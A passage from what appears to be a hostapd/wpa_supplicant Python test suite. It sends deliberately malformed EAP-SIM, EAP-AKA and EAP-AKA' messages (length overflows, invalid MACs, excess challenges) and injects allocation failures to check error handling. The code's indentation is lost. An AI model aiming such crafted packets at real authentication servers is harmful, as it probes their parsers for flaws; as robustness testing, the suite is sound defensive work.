EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_MAC, 5, 0, 1, 2, 3, 4,
EAP_SIM_AT_RAND, 5, 0, 5, 6, 7, 8,
EAP_SIM_AT_AUTN, 5, 0, 9, 10,
0x2fda8ef7, 0xbba518cc)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge - Invalid MAC")
return struct.pack(">BBHBBHBBHBBBBBBHBBH4LBBH4LBBH4L",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4 + 20 + 20 + 20,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_MAC, 5, 0, 1, 2, 3, 4,
EAP_SIM_AT_RAND, 5, 0, 5, 6, 7, 8,
EAP_SIM_AT_AUTN, 5, 0, 0xffffffff, 0xffffffff,
0xd1f90322, 0x40514cb4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge - Valid MAC")
return struct.pack(">BBHBBHBBHBBBBBBHBBH4LBBH4LBBH4L",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4 + 20 + 20 + 20,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_MAC, 5, 0,
0xf4a3c1d3, 0x7c901401, 0x34bd8b01, 0x6f7fa32f,
EAP_SIM_AT_RAND, 5, 0, 5, 6, 7, 8,
EAP_SIM_AT_AUTN, 5, 0, 0xffffffff, 0xffffffff,
0xd1f90322, 0x40514cb4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_KDF_INPUT length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_KDF_INPUT, 2, 0xffff, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_KDF length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_KDF, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with large number of KDF proposals")
return struct.pack(">BBHBBHBBHBBHBBHBBHBBHBBHBBHBBHBBHBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 12 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254,
EAP_SIM_AT_KDF, 1, 253,
EAP_SIM_AT_KDF, 1, 252,
EAP_SIM_AT_KDF, 1, 251,
EAP_SIM_AT_KDF, 1, 250,
EAP_SIM_AT_KDF, 1, 249,
EAP_SIM_AT_KDF, 1, 248,
EAP_SIM_AT_KDF, 1, 247,
EAP_SIM_AT_KDF, 1, 246,
EAP_SIM_AT_KDF, 1, 245,
EAP_SIM_AT_KDF, 1, 244)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
return None
srv = start_radius_server(aka_prime_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
for i in range(0, 16):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="AKA'", identity="6555444333222111",
password="5122250214c33e723a5dd523fc145fc0:981d464c7c52eb6e5036234984ad0bcf:000000000123",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
if i in [ 0 ]:
time.sleep(0.1)
else:
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
timeout=10)
if ev is None:
raise Exception("Timeout on EAP failure")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
def test_eap_proto_sim(dev, apdev):
"""EAP-SIM protocol tests"""
def sim_handler(ctx, req):
logger.info("sim_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_SIM)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected AT_AUTN")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_AUTN, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short AT_VERSION_LIST")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: AT_VERSION_LIST overflow")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 1, 0xffff)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected AT_AUTS")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_AUTS, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected AT_CHECKCODE")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_CHECKCODE, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No AT_VERSION_LIST in Start")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No support version in AT_VERSION_LIST")
return struct.pack(">BBHBBHBBH4B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 3, 2, 3, 4, 5)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request without ID type")
return struct.pack(">BBHBBHBBH2H", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID (duplicate)")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request FULLAUTH_ID")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request FULLAUTH_ID (duplicate)")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request FULLAUTH_ID")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request PERMANENT_ID")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_PERMANENT_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request PERMANENT_ID (duplicate)")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_PERMANENT_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No AT_MAC and AT_RAND in Challenge")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CHALLENGE, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No AT_RAND in Challenge")
return struct.pack(">BBHBBHBBH4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 20,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Insufficient number of challenges in Challenge")
return struct.pack(">BBHBBHBBH4LBBH4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 20 + 20,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_RAND, 5, 0, 0, 0, 0, 0,
EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too many challenges in Challenge")
return struct.pack(">BBHBBHBBH4L4L4L4LBBH4L", EAP_CODE_REQUEST,
ctx['id'],
4 + 1 + 3 + 4 + 4 * 16 + 20,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_RAND, 17, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0,
EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Same RAND multiple times in Challenge")
return struct.pack(">BBHBBHBBH4L4L4LBBH4L", EAP_CODE_REQUEST,
ctx['id'],
4 + 1 + 3 + 4 + 3 * 16 + 20,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_RAND, 13, 0, 0, 0, 0, 0, 0, 0, 0, 1,
0, 0, 0, 0,
EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification with no attributes")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification indicating success, but no MAC")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 32768)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification indicating success, but invalid MAC value")
return struct.pack(">BBHBBHBBHBBH4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 20,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 32768,
EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification before auth")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 16384)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification before auth")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 16385)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification with unrecognized non-failure")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 0xc000)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification before auth (duplicate)")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 0xc000)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Re-authentication (unexpected) with no attributes")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_REAUTHENTICATION,
0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Client Error")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CLIENT_ERROR, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unknown subtype")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SIM, 255, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
return None
srv = start_radius_server(sim_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
for i in range(0, 25):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SIM", identity="1232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
if i in [ 0 ]:
time.sleep(0.1)
else:
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
timeout=10)
if ev is None:
raise Exception("Timeout on EAP failure")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
def test_eap_proto_sim_errors(dev, apdev):
"""EAP-SIM protocol tests (error paths)"""
check_hlr_auc_gw_support()
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0]['ifname'], params)
with alloc_fail(dev[0], 1, "eap_sim_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SIM", identity="1232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with fail_test(dev[0], 1, "os_get_random;eap_sim_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SIM", identity="1232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SIM", identity="1232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581")
with fail_test(dev[0], 1, "aes_128_cbc_encrypt;eap_sim_response_reauth"):
hapd.request("EAPOL_REAUTH " + dev[0].own_addr())
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
if ev is None:
raise Exception("EAP re-authentication did not start")
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SIM", identity="1232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581")
with fail_test(dev[0], 1, "os_get_random;eap_sim_msg_add_encr_start"):
hapd.request("EAPOL_REAUTH " + dev[0].own_addr())
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
if ev is None:
raise Exception("EAP re-authentication did not start")
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SIM", identity="1232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581")
with fail_test(dev[0], 1, "os_get_random;eap_sim_init_for_reauth"):
hapd.request("EAPOL_REAUTH " + dev[0].own_addr())
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
if ev is None:
raise Exception("EAP re-authentication did not start")
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SIM", identity="1232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581")
with alloc_fail(dev[0], 1, "eap_sim_parse_encr;eap_sim_process_reauthentication"):
hapd.request("EAPOL_REAUTH " + dev[0].own_addr())
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
if ev is None:
raise Exception("EAP re-authentication did not start")
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
tests = [ (1, "eap_sim_verify_mac;eap_sim_process_challenge"),
(1, "eap_sim_parse_encr;eap_sim_process_challenge"),
(1, "eap_sim_msg_init;eap_sim_response_start"),
(1, "wpabuf_alloc;eap_sim_msg_init;eap_sim_response_start"),
(1, "=eap_sim_learn_ids"),
(2, "=eap_sim_learn_ids"),
(2, "eap_sim_learn_ids"),
(3, "eap_sim_learn_ids"),
(1, "eap_sim_process_start"),
(1, "eap_sim_getKey"),
(1, "eap_sim_get_emsk"),
(1, "eap_sim_get_session_id") ]
for count, func in tests:
with alloc_fail(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SIM", identity="1232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581",
erp="1", wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
tests = [ (1, "aes_128_cbc_decrypt;eap_sim_parse_encr") ]
for count, func in tests:
with fail_test(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SIM", identity="1232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
def test_eap_proto_aka_errors(dev, apdev):
"""EAP-AKA protocol tests (error paths)"""
check_hlr_auc_gw_support()
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0]['ifname'], params)
with alloc_fail(dev[0], 1, "eap_aka_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="AKA", identity="0232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581:000000000123",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "=eap_aka_learn_ids"),
(2, "=eap_aka_learn_ids"),
(1, "eap_sim_parse_encr;eap_aka_process_challenge"),
(1, "eap_aka_getKey"),
(1, "eap_aka_get_emsk"),
(1, "eap_aka_get_session_id") ]
for count, func in tests:
with alloc_fail(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="AKA", identity="0232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581:000000000123",
erp="1", wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
def test_eap_proto_aka_prime_errors(dev, apdev):
"""EAP-AKA' protocol tests (error paths)"""
check_hlr_auc_gw_support()
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0]['ifname'], params)
with alloc_fail(dev[0], 1, "eap_aka_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="AKA'", identity="6555444333222111",
password="5122250214c33e723a5dd523fc145fc0:981d464c7c52eb6e5036234984ad0bcf:000000000123",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="AKA'", identity="6555444333222111",
password="5122250214c33e723a5dd523fc145fc0:981d464c7c52eb6e5036234984ad0bcf:000000000123")
with fail_test(dev[0], 1, "aes_128_cbc_encrypt;eap_aka_response_reauth"):
hapd.request("EAPOL_REAUTH " + dev[0].own_addr())
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
if ev is None:
raise Exception("EAP re-authentication did not start")
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="AKA'", identity="6555444333222111",
password="5122250214c33e723a5dd523fc145fc0:981d464c7c52eb6e5036234984ad0bcf:000000000123")
with alloc_fail(dev[0], 1, "eap_sim_parse_encr;eap_aka_process_reauthentication"):
hapd.request("EAPOL_REAUTH " + dev[0].own_addr())
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
if ev is None:
raise Exception("EAP re-authentication did not start")
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
tests = [ (1, "eap_sim_verify_mac_sha256"),
(1, "=eap_aka_process_challenge") ]
for count, func in tests:
with alloc_fail(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
